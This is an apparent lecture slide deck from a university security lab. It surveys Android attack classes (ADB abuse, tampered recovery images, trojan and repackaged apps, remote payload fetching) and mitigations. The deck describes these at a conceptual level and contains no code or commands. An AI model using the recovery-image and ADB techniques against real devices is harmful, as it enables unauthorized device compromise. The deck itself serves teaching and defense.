Slide 1

All Your Droid Are Belong To Us: A Survey of Current Android Attacks OS 2015. 04. 21

Slide 2

Computer Security & OS Lab. ContentsContents 2 Introduction Android Security Model Android Security Model Analysis Attack Classes Mitigations Conclusion

Slide 3

Computer Security & OS Lab. IntroductionIntroduction 3 Todays smartphone has as much processing power and memory as a high end laptop computer Smartphone always-on devices which phone network connect and GPS services Mobile OS made for more efficient management and large-scale attacks Introduce attack mitigation about current security model

Slide 4

Computer Security & OS Lab. Android Security Model 4 Android is a Linux-based operating system, with a layered structure of services Core native libraries(C) Application framework(JAVA) Android permission model Application require permission for request system resource Each application is sandboxed by the kernel Applications have different UID Application cannot access other application space Application can request other applications resource with IPC(Intent)

Slide 5

Computer Security & OS Lab. Android Security Model 5 Confirm installing an application Before installing an applications, the user is presented with a list of all This method is difficult for most users to understand. IPC mechanism more difficult to understand Android system provide only two choices Yes or no

Slide 6

Computer Security & OS Lab. Android Security Model 6 Android Market is self-signing mechanism Market without employing any kind of central authority versus Apples App Store This open policy attractive for attacker

Slide 7

Computer Security & OS Lab. Android Security Model Analysis 7 Application model SMS event cause broadcast to be sent system wide. Application register the ability to take action when broadcast observed And can assign themselves a priority over the broadcast Application can prevent broadcast

Slide 8

Computer Security & OS Lab. Android Security Model Analysis 8 Patch cycle

Slide 9

Computer Security & OS Lab. Android Security Model Analysis 9 Trusted USB Connections ADB bypass android market (for installing/uninstalling application) Unprivileged remote shell Attacker can executing malicious tool for exploit vulnerability Recovery mode and boot process Attacker can replace malicious recovery image file For privileged access to the users information Uniform privilege separation Security application, such as anti-virus application, limited AV require root privilege in order to block malware, spyware and phishing apps

Slide 10

Computer Security & OS Lab. Attack Classes 10 No physical access Attacker remote attack rely heavily on social engineering Ex) phishing, farming Attacker must get some malicious software To run code remotely on users device Physical access with ADB enabled Non password or screen lock With ADB enabled Attacker can exploit the device through ADB Physical access without ADB enabled Attacker unable to use ADB service Attacker load malicious code via recovery mode Physical access on unobstructed device Non password or screen lock Attacker enabling ADB on, installing malicious application etc.

Slide 11

Computer Security & OS Lab. Unprivileged Attacks 11 User installing application via internet Application sandboxed but access system resource with permissions Trojan malware application found in legitimate Android Market Malicious application running background with registered intent Malicious application using legitimate API for disable screen lock Application repackaging for downloading in Android Market

Slide 12

Computer Security & OS Lab. Remote Exploitation 12 Oberheids seemingly benign application but application would routinely make remote request for new payloads to execute. For privilege escalation Linux exploit adaptable Android OS This feature maximized slow patch cycle

Slide 13

Computer Security & OS Lab. Physical Access without ADB Enabled 13 Attackers targeting recovery mode Generate customized recovery image Modification init.rc and default.prop Modified init.rc run malicious code, such as root-kit init.rc file executable right to an su executable. default.prop file exchange ADB state unable -> enable Physical access to unobstructed device Adaptable all methodologies

Slide 14

Computer Security & OS Lab. MitigationsMitigations 14 Reduce the Patch Cycle Length Separation between Googles core and manufacturers patch Privileged Applications Change permissions hierarchy Leveraging Existing Security Technologies Adapting SELinux TaintDroid Authenticated Downloads Apples AppStore Authenticated ADB Trusted Platform Module

Slide 15

Computer Security & OS Lab. ConclusionConclusion 15

Slide 16

Computer Security & OS Lab. ReferenceReference 16 http://developer.android.com/guide/topics/manifest/intent-filter- element.html http://developer.android.com/guide/topics/manifest/intent-filter- element.html http://ko.wikipedia.org/wiki/ _ _ http://ko.wikipedia.org/wiki/ _ _

Slide 17

.